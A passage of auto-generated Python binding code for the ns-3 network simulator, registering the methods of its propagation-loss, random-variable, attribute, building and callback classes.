ns3::TwoRayGroundPropagationLossModel::SetFrequency(double frequency) [member function] cls.add_method('SetFrequency', 'void', [param('double', 'frequency')]) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetSystemLoss(double systemLoss) [member function] cls.add_method('SetSystemLoss', 'void', [param('double', 'systemLoss')]) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetMinDistance(double minDistance) [member function] cls.add_method('SetMinDistance', 'void', [param('double', 'minDistance')]) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetMinDistance() const [member function] cls.add_method('GetMinDistance', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetFrequency() const [member function] cls.add_method('GetFrequency', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetSystemLoss() const [member function] cls.add_method('GetSystemLoss', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetHeightAboveZ(double heightAboveZ) [member function] cls.add_method('SetHeightAboveZ', 'void', [param('double', 'heightAboveZ')]) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::TwoRayGroundPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3UniformDiscPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::UniformDiscPositionAllocator::UniformDiscPositionAllocator(ns3::UniformDiscPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::UniformDiscPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::UniformDiscPositionAllocator::UniformDiscPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::UniformDiscPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::UniformDiscPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::UniformDiscPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::UniformDiscPositionAllocator::SetRho(double rho) [member function] cls.add_method('SetRho', 'void', [param('double', 'rho')]) ## position-allocator.h (module 'mobility'): void ns3::UniformDiscPositionAllocator::SetX(double x) [member function] cls.add_method('SetX', 'void', [param('double', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::UniformDiscPositionAllocator::SetY(double y) [member function] cls.add_method('SetY', 'void', [param('double', 'y')]) return def register_Ns3UniformRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::UniformRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable::UniformRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue(double min, double max) [member function] cls.add_method('GetValue', 'double', [param('double', 'min'), param('double', 'max')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger(uint32_t min, uint32_t max) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'min'), param('uint32_t', 'max')]) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3WeibullRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::WeibullRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable::WeibullRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetScale() const [member function] cls.add_method('GetScale', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetShape() const [member function] cls.add_method('GetShape', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue(double scale, double shape, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'scale'), param('double', 'shape'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger(uint32_t scale, uint32_t shape, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZetaRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZetaRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable::ZetaRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue(double alpha) [member function] cls.add_method('GetValue', 'double', [param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger(uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZipfRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZipfRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'n'), param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'n'), param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3AttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function] cls.add_method('CreateValidValue', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::AttributeValue const &', 'value')], is_const=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function] cls.add_method('GetValueTypeName', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3BoxChecker_methods(root_module, cls): ## box.h (module 'mobility'): ns3::BoxChecker::BoxChecker() [constructor] cls.add_constructor([]) ## box.h (module 'mobility'): ns3::BoxChecker::BoxChecker(ns3::BoxChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::BoxChecker const &', 'arg0')]) return def register_Ns3BoxValue_methods(root_module, cls): ## box.h (module 'mobility'): ns3::BoxValue::BoxValue() [constructor] cls.add_constructor([]) ## box.h (module 'mobility'): ns3::BoxValue::BoxValue(ns3::BoxValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::BoxValue const &', 'arg0')]) ## box.h (module 'mobility'): ns3::BoxValue::BoxValue(ns3::Box const & value) [constructor] cls.add_constructor([param('ns3::Box const &', 'value')]) ## box.h (module 'mobility'): ns3::Ptr<ns3::AttributeValue> ns3::BoxValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## box.h (module 'mobility'): bool ns3::BoxValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## box.h (module 'mobility'): ns3::Box ns3::BoxValue::Get() const [member function] cls.add_method('Get', 'ns3::Box', [], is_const=True) ## box.h (module 'mobility'): std::string ns3::BoxValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## box.h (module 'mobility'): void ns3::BoxValue::Set(ns3::Box const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Box const &', 'value')]) return def register_Ns3Building_methods(root_module, cls): ## building.h (module 'buildings'): ns3::Building::Building(ns3::Building const & arg0) [copy constructor] cls.add_constructor([param('ns3::Building const &', 'arg0')]) ## building.h (module 'buildings'): ns3::Building::Building(double xMin, double xMax, double yMin, double yMax, double zMin, double zMax) [constructor] cls.add_constructor([param('double', 'xMin'), param('double', 'xMax'), param('double', 'yMin'), param('double', 'yMax'), param('double', 'zMin'), param('double', 'zMax')]) ## building.h (module 'buildings'): ns3::Building::Building() [constructor] cls.add_constructor([]) ## building.h (module 'buildings'): void ns3::Building::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], is_virtual=True) ## building.h (module 'buildings'): ns3::Box ns3::Building::GetBoundaries() const [member function] cls.add_method('GetBoundaries', 'ns3::Box', [], is_const=True) ## building.h (module 'buildings'): ns3::Building::BuildingType_t ns3::Building::GetBuildingType() const [member function] cls.add_method('GetBuildingType', 'ns3::Building::BuildingType_t', [], is_const=True) ## building.h (module 'buildings'): ns3::Building::ExtWallsType_t ns3::Building::GetExtWallsType() const [member function] cls.add_method('GetExtWallsType', 'ns3::Building::ExtWallsType_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetFloor(ns3::Vector position) const [member function] cls.add_method('GetFloor', 'uint16_t', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): uint32_t ns3::Building::GetId() const [member function] cls.add_method('GetId', 'uint32_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetNFloors() const [member function] cls.add_method('GetNFloors', 'uint16_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetNRoomsX() const [member function] cls.add_method('GetNRoomsX', 'uint16_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetNRoomsY() const [member function] cls.add_method('GetNRoomsY', 'uint16_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetRoomX(ns3::Vector position) const [member function] cls.add_method('GetRoomX', 'uint16_t', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetRoomY(ns3::Vector position) const [member function] cls.add_method('GetRoomY', 'uint16_t', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): static ns3::TypeId ns3::Building::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## building.h (module 'buildings'): bool ns3::Building::IsInside(ns3::Vector position) const [member function] cls.add_method('IsInside', 'bool', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): void ns3::Building::SetBoundaries(ns3::Box box) [member function] cls.add_method('SetBoundaries', 'void', [param('ns3::Box', 'box')]) ## building.h (module 'buildings'): void ns3::Building::SetBuildingType(ns3::Building::BuildingType_t t) [member function] cls.add_method('SetBuildingType', 'void', [param('ns3::Building::BuildingType_t', 't')]) ## building.h (module 'buildings'): void ns3::Building::SetExtWallsType(ns3::Building::ExtWallsType_t t) [member function] cls.add_method('SetExtWallsType', 'void', [param('ns3::Building::ExtWallsType_t', 't')]) ## building.h (module 'buildings'): void ns3::Building::SetNFloors(uint16_t nfloors) [member function] cls.add_method('SetNFloors', 'void', [param('uint16_t', 'nfloors')]) ## building.h (module 'buildings'): void ns3::Building::SetNRoomsX(uint16_t nroomx) [member function] cls.add_method('SetNRoomsX', 'void', [param('uint16_t', 'nroomx')]) ## building.h (module 'buildings'): void ns3::Building::SetNRoomsY(uint16_t nroomy) [member function] cls.add_method('SetNRoomsY', 'void', [param('uint16_t', 'nroomy')]) return def register_Ns3BuildingsPropagationLossModel_methods(root_module, cls): ## buildings-propagation-loss-model.h (module 'buildings'): ns3::BuildingsPropagationLossModel::BuildingsPropagationLossModel() [constructor] cls.add_constructor([]) ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, is_virtual=True) ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_pure_virtual=True, is_const=True, is_virtual=True) ## buildings-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::BuildingsPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## buildings-propagation-loss-model.h (module 'buildings'): int64_t ns3::BuildingsPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='protected', is_virtual=True) ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::EvaluateSigma(ns3::Ptr<ns3::MobilityBuildingInfo> a, ns3::Ptr<ns3::MobilityBuildingInfo> b) const [member function] cls.add_method('EvaluateSigma', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'a'), param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'b')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::ExternalWallLoss(ns3::Ptr<ns3::MobilityBuildingInfo> a) const [member function] cls.add_method('ExternalWallLoss', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'a')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::GetShadowing(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetShadowing', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::HeightLoss(ns3::Ptr<ns3::MobilityBuildingInfo> n) const [member function] cls.add_method('HeightLoss', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'n')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::InternalWallsLoss(ns3::Ptr<ns3::MobilityBuildingInfo> a, ns3::Ptr<ns3::MobilityBuildingInfo> b) const [member function] cls.add_method('InternalWallsLoss', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'a'), param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'b')], is_const=True, visibility='protected') return def register_Ns3CallbackChecker_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')]) return def register_Ns3CallbackImplBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')]) ## callback.h (module 'core'): std::string ns3::CallbackImplBase::GetTypeid() const [member function] cls.add_method('GetTypeid', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): static std::string ns3::CallbackImplBase::Demangle(std::string const & mangled) [member function] cls.add_method('Demangle', 'std::string', [param('std::string const &', 'mangled')], is_static=True, visibility='protected') return def register_Ns3CallbackValue_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'base')]) ## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function] cls.add_method('Set', 'void', [param('ns3::CallbackBase', 'base')]) return def register_Ns3ConstantRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function] cls.add_method('GetConstant', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function] cls.add_method('GetValue', 'double', [param('double', 'constant')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'constant')]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3DeterministicRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function] cls.add_method('SetValueArray', 'void', [param('double *', 'values'), param('uint64_t', 'length')]) ## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3EmpiricalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function] cls.add_method('CDF', 'void', [param('double', 'v'), param('double', 'c')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double c1, double c2, double v1, double v2, double r) [member function] cls.add_method('Interpolate', 'double', [param('double', 'c1'), param('double', 'c2'), param('double', 'v1'), param('double', 'v2'), param('double', 'r')], visibility='private', is_virtual=True) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function] cls.add_method('Validate', 'void', [], visibility='private', is_virtual=True) return def register_Ns3EmptyAttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor(ns3::EmptyAttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object'), param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True) return def register_Ns3EmptyAttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker(ns3::EmptyAttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeChecker::Create() const [member function] cls.add_method('Create', 